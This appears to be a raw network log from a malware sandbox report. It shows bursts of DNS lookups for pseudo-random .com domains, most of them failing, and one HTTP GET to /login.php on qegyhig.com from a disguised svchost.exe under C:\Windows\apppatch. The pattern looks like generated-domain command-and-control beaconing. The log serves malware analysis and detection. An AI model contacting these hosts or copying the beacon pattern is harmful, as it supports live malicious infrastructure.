                                                                                                                                                                                                          Sep 8, 2024 10:54:25.681297064 CEST1.1.1.1192.168.2.90x98f4Name error (3)lysyjex.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.682482004 CEST1.1.1.1192.168.2.90x163dName error (3)qekytig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.683000088 CEST1.1.1.1192.168.2.90x2282Name error (3)qexysev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.683725119 CEST1.1.1.1192.168.2.90x9123Name error (3)vopyjac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.683804035 CEST1.1.1.1192.168.2.90x6426Name error (3)lykytin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.684114933 CEST1.1.1.1192.168.2.90xe794Name error (3)lymynuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.684391975 CEST1.1.1.1192.168.2.90x4d18Name error (3)pupyjap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.685899019 CEST1.1.1.1192.168.2.90xa818Name error (3)purymog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.686043024 CEST1.1.1.1192.168.2.90xa463Name error (3)vocydyc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.686188936 CEST1.1.1.1192.168.2.90xcfcaName error (3)gadykyz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.686434031 CEST1.1.1.1192.168.2.90x7923Name error (3)qegylul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.686695099 CEST1.1.1.1192.168.2.90x8d92Name error (3)qetyqag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.686841011 CEST1.1.1.1192.168.2.90x2d98Name error (3)gahyziw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.688179970 CEST1.1.1.1192.168.2.90xe97bName error (3)vonybuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.693543911 CEST1.1.1.1192.168.2.90x8cbfName error (3)lyvyfux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.700716972 CEST1.1.1.1192.168.2.90xdedeName error (3)pujyxoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.702457905 CEST1.1.1.1192.168.2.90xedecName error (3)pumybuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.702469110 CEST1.1.1.1192.168.2.90x7cbcName error (3)galypob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.703039885 CEST1.1.1.1192.168.2.90x1f3Name error (3)pupywyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.703140974 CEST1.1.1.1192.168.2.90x5855Name error (3)pujytug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.703710079 CEST1.1.1.1192.168.2.90x1068Name error (3)puvydyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.705228090 CEST1.1.1.1192.168.2.90xbb24Name error (3)lygylur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.706109047 CEST1.1.1.1192.168.2.90xe3bbName error (3)lysywyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.707055092 CEST1.1.1.1192.168.2.90x5870Name error (3)vonygit.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.708632946 CEST1.1.1.1192.168.2.90xf161Name error (3)lygytix.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.709594011 CEST1.1.1.1192.168.2.90x1851Name error (3)vopyqef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.713578939 CEST1.1.1.1192.168.2.90x3e17Name error (3)lykyxoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.713659048 CEST1.1.1.1192.168.2.90x90f5Name error (3)ganyfuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.722534895 CEST1.1.1.1192.168.2.90x1c06Name error (3)vofykyt.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.723944902 CEST1.1.1.1192.168.2.90x1398Name error (3)pufytip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.724507093 CEST1.1.1.1192.168.2.90x8221Name error (3)lyryman.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.724589109 CEST1.1.1.1192.168.2.90xf04dName error (3)vowyjak.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.724955082 CEST1.1.1.1192.168.2.90x7db5Name error (3)qebyfup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.727603912 CEST1.1.1.1192.168.2.90xc30aName error (3)vojyzik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.728295088 CEST1.1.1.1192.168.2.90xe935Name error (3)vowymom.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.735392094 CEST1.1.1.1192.168.2.90x51c1Name error (3)lyvyver.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.746071100 CEST1.1.1.1192.168.2.90xe224Name error (3)qetyhov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.746098995 CEST1.1.1.1192.168.2.90x66aeName error (3)vojyrum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.755991936 CEST1.1.1.1192.168.2.90x4603Name error (3)gatyhos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.318732977 CEST1.1.1.1192.168.2.90x8807Name error (3)puvycel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.318830967 CEST1.1.1.1192.168.2.90x5d42Name error (3)ganycob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.322679043 CEST1.1.1.1192.168.2.90x9928Name error (3)lykywex.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.327722073 CEST1.1.1.1192.168.2.90xdd34Name error (3)pupyguq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.329139948 CEST1.1.1.1192.168.2.90xcca1Name error (3)qekyryp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.331231117 CEST1.1.1.1192.168.2.90x2654Name error (3)lysygij.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.332392931 CEST1.1.1.1192.168.2.90xe030Name error (3)pumycav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.332473040 CEST1.1.1.1192.168.2.90x3b58Name error (3)vonycaf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.336417913 CEST1.1.1.1192.168.2.90xa04dName error (3)vopyguk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.337620974 CEST1.1.1.1192.168.2.90xf398Name error (3)lymyved.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.342153072 CEST1.1.1.1192.168.2.90x904Name error (3)volyrut.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.349369049 CEST1.1.1.1192.168.2.90xfeabName error (3)galyryz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.356664896 CEST1.1.1.1192.168.2.90x7669Name error (3)vofyjom.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.356959105 CEST1.1.1.1192.168.2.90xf15fName error (3)qedyhiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.363697052 CEST1.1.1.1192.168.2.90xc572Name error (3)gadyhoh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.366028070 CEST1.1.1.1192.168.2.90x7448Name error (3)lyxytur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.370547056 CEST1.1.1.1192.168.2.90x815bName error (3)qeqyvev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.371125937 CEST1.1.1.1192.168.2.90xd55Name error (3)puzytul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.402911901 CEST1.1.1.1192.168.2.90xc619Name error (3)gaqyvys.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.411802053 CEST1.1.1.1192.168.2.90xd16cName error (3)qexytil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.412703037 CEST1.1.1.1192.168.2.90x7418Name error (3)vowybyc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.413568974 CEST1.1.1.1192.168.2.90xc795Name error (3)pufyjag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.414593935 CEST1.1.1.1192.168.2.90x836bName error (3)purybup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.414606094 CEST1.1.1.1192.168.2.90x814Name error (3)gacypiw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.421859026 CEST1.1.1.1192.168.2.90xb0d5Name error (3)lygyjan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.423162937 CEST1.1.1.1192.168.2.90xad11Name error (3)vocypok.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.426460981 CEST1.1.1.1192.168.2.90x764aName error (3)lyrynux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.427025080 CEST1.1.1.1192.168.2.90x7432Name error (3)lyvysaj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.429187059 CEST1.1.1.1192.168.2.90xff65Name error (3)vonydem.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.722671986 CEST1.1.1.1192.168.2.90x6f6eName error (3)puzyxip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.723840952 CEST1.1.1.1192.168.2.90x9a9cName error (3)qegykeg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.725080013 CEST1.1.1.1192.168.2.90xfc0fName error (3)gadyqaw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.727112055 CEST1.1.1.1192.168.2.90x459eName error (3)lyrygid.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.727852106 CEST1.1.1.1192.168.2.90x8d11Name error (3)vocycat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:26.728137970 CEST1.1.1.1192.168.2.90x1b2Name error (3)gacycaz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.387093067 CEST1.1.1.1192.168.2.90x7d05Name error (3)lykygun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.387707949 CEST1.1.1.1192.168.2.90x65e7Name error (3)pupycop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.391940117 CEST1.1.1.1192.168.2.90x6186Name error (3)qekyhug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.392575979 CEST1.1.1.1192.168.2.90xe7dName error (3)lysyvax.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.392971039 CEST1.1.1.1192.168.2.90x36a4Name error (3)pumytyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.400203943 CEST1.1.1.1192.168.2.90x304Name error (3)qedyvap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.406991005 CEST1.1.1.1192.168.2.90xca10Name error (3)vopycoc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.411123991 CEST1.1.1.1192.168.2.90x585bName error (3)volyjif.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.411670923 CEST1.1.1.1192.168.2.90x86a6Name error (3)vonyryk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.411766052 CEST1.1.1.1192.168.2.90x92fcName error (3)qetysog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.412826061 CEST1.1.1.1192.168.2.90xcecdName error (3)qebylyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.412966013 CEST1.1.1.1192.168.2.90xd4e7Name error (3)puzymup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.413625002 CEST1.1.1.1192.168.2.90xeb9eName error (3)gatydab.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.413762093 CEST1.1.1.1192.168.2.90x8fb7Name error (3)vojymuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.413997889 CEST1.1.1.1192.168.2.90xe80bName error (3)ganyzuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.414186001 CEST1.1.1.1192.168.2.90xd488Name error (3)vopydaf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.414230108 CEST1.1.1.1192.168.2.90xaa68Name error (3)gatycis.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.415540934 CEST1.1.1.1192.168.2.90x9b14Name error (3)lygyfej.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.417728901 CEST1.1.1.1192.168.2.90x3779Name error (3)lyryson.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.418037891 CEST1.1.1.1192.168.2.90x646eName error (3)gahynuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.418811083 CEST1.1.1.1192.168.2.90x5e09Name error (3)purypig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.418905020 CEST1.1.1.1192.168.2.90xc5Name error (3)vowypim.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.419081926 CEST1.1.1.1192.168.2.90xcfbaName error (3)gacykas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.419172049 CEST1.1.1.1192.168.2.90x98fbName error (3)pufybyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.420006037 CEST1.1.1.1192.168.2.90xf298Name error (3)qegynul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.420248032 CEST1.1.1.1192.168.2.90x2a37Name error (3)vofybet.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.420588017 CEST1.1.1.1192.168.2.90x4a75Name error (3)puzyjov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.420766115 CEST1.1.1.1192.168.2.90x9a0cName error (3)qeqytuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.421260118 CEST1.1.1.1192.168.2.90x89ceName error (3)pufydaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.426539898 CEST1.1.1.1192.168.2.90x4f8Name error (3)lyxyjod.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.427757025 CEST1.1.1.1192.168.2.90xb3f6Name error (3)lygynyr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.429269075 CEST1.1.1.1192.168.2.90x291aName error (3)puvylep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.429280996 CEST1.1.1.1192.168.2.90xfca8Name error (3)vocykec.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.429290056 CEST1.1.1.1192.168.2.90x2174Name error (3)lyvylyx.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.430493116 CEST1.1.1.1192.168.2.90x470bName error (3)pujymiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.434501886 CEST1.1.1.1192.168.2.90xb332Name error (3)qekyqoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.440423965 CEST1.1.1.1192.168.2.90x239Name error (3)qexykav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.440449953 CEST1.1.1.1192.168.2.90xf84bName error (3)gaqypuh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.442971945 CEST1.1.1.1192.168.2.90xdb5fName error (3)lymytuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.445445061 CEST1.1.1.1192.168.2.90xececName error (3)vowyzuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.447284937 CEST1.1.1.1192.168.2.90xaa3eName error (3)qexyqip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.545157909 CEST1.1.1.1192.168.2.90xf306Name error (3)galyhib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.574647903 CEST1.1.1.1192.168.2.90xa1a4Name error (3)gadyvez.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.416008949 CEST1.1.1.1192.168.2.90xccdbName error (3)pumyleg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.416280031 CEST1.1.1.1192.168.2.90x20d9Name error (3)qebykoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.416568995 CEST1.1.1.1192.168.2.90x4ed0Name error (3)galynus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.418231010 CEST1.1.1.1192.168.2.90x7a83Name error (3)lykynyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.418421030 CEST1.1.1.1192.168.2.90x9eb4Name error (3)vopyput.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.421343088 CEST1.1.1.1192.168.2.90x2d0fName error (3)qekynyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.422837019 CEST1.1.1.1192.168.2.90x46f9Name error (3)vojybef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.423103094 CEST1.1.1.1192.168.2.90x973Name error (3)qetytup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.426482916 CEST1.1.1.1192.168.2.90x80caName error (3)qegyvag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.426495075 CEST1.1.1.1192.168.2.90xae5fName error (3)lyrytyx.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.426613092 CEST1.1.1.1192.168.2.90x8919Name error (3)gahyvab.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.427087069 CEST1.1.1.1192.168.2.90x2e3aName error (3)pujybev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.427222967 CEST1.1.1.1192.168.2.90x3f61Name error (3)lyvyjoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.433140039 CEST1.1.1.1192.168.2.90x8efName error (3)volymuc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.433867931 CEST1.1.1.1192.168.2.90xae05Name error (3)purytyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.434326887 CEST1.1.1.1192.168.2.90xcf5fName error (3)qedysol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.434943914 CEST1.1.1.1192.168.2.90x8413Name error (3)vocyjik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.435070992 CEST1.1.1.1192.168.2.90x89a4Name error (3)lysysir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.435849905 CEST1.1.1.1192.168.2.90xa5eeName error (3)vonykam.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.437745094 CEST1.1.1.1192.168.2.90x18bName error (3)lymylen.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.440747976 CEST1.1.1.1192.168.2.90x76baName error (3)gacyhuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.486362934 CEST1.1.1.1192.168.2.90xd147Name error (3)lyxygur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.491731882 CEST1.1.1.1192.168.2.90xaf3eName error (3)lygyvon.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.493696928 CEST1.1.1.1192.168.2.90xb992Name error (3)lyryler.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.496946096 CEST1.1.1.1192.168.2.90xbcabName error (3)pumywov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.498425961 CEST1.1.1.1192.168.2.90x6c1dName error (3)vonyqof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.499890089 CEST1.1.1.1192.168.2.90x96e4Name error (3)vocymum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.505546093 CEST1.1.1.1192.168.2.90x9952Name error (3)qexyhul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.506608963 CEST1.1.1.1192.168.2.90xf421Name error (3)pufycog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.524898052 CEST1.1.1.1192.168.2.90x5ec7Name error (3)vopyzyk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.525413990 CEST1.1.1.1192.168.2.90xd9eeName error (3)lygysid.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.527143002 CEST1.1.1.1192.168.2.90x25bdName error (3)qebyqig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.528670073 CEST1.1.1.1192.168.2.90x3f9aName error (3)ganykah.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.530653954 CEST1.1.1.1192.168.2.90x5782Name error (3)vojydoc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.531142950 CEST1.1.1.1192.168.2.90x8431Name error (3)gatyzyw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.531155109 CEST1.1.1.1192.168.2.90x80fName error (3)pufypuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.531999111 CEST1.1.1.1192.168.2.90x32eeName error (3)lykyfax.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.533159971 CEST1.1.1.1192.168.2.90x94efName error (3)purylal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.533365965 CEST1.1.1.1192.168.2.90xe74Name error (3)qetylel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.534276962 CEST1.1.1.1192.168.2.90x84f4Name error (3)ganyqib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.537197113 CEST1.1.1.1192.168.2.90x3654Name error (3)vofycim.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:35.538096905 CEST1.1.1.1192.168.2.90xa16Name error (3)lymywad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          0192.168.2.949707188.114.96.3801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.369887114 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.077415943 CEST622INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:35 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://qegyhig.com/login.php
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8B9lcaxXlnk%2BOz9EOM2NSYDXsyHZhWHInGSP1wspaAdXwe%2FPr9zYNyWymAZyjgYEKuw%2FlbZUy%2FtsKoDDMws14EpL1WjNkaqd2cnqdVjA3f3VwHep5Gv%2BEFPydmRtOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb4055cb843e7-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
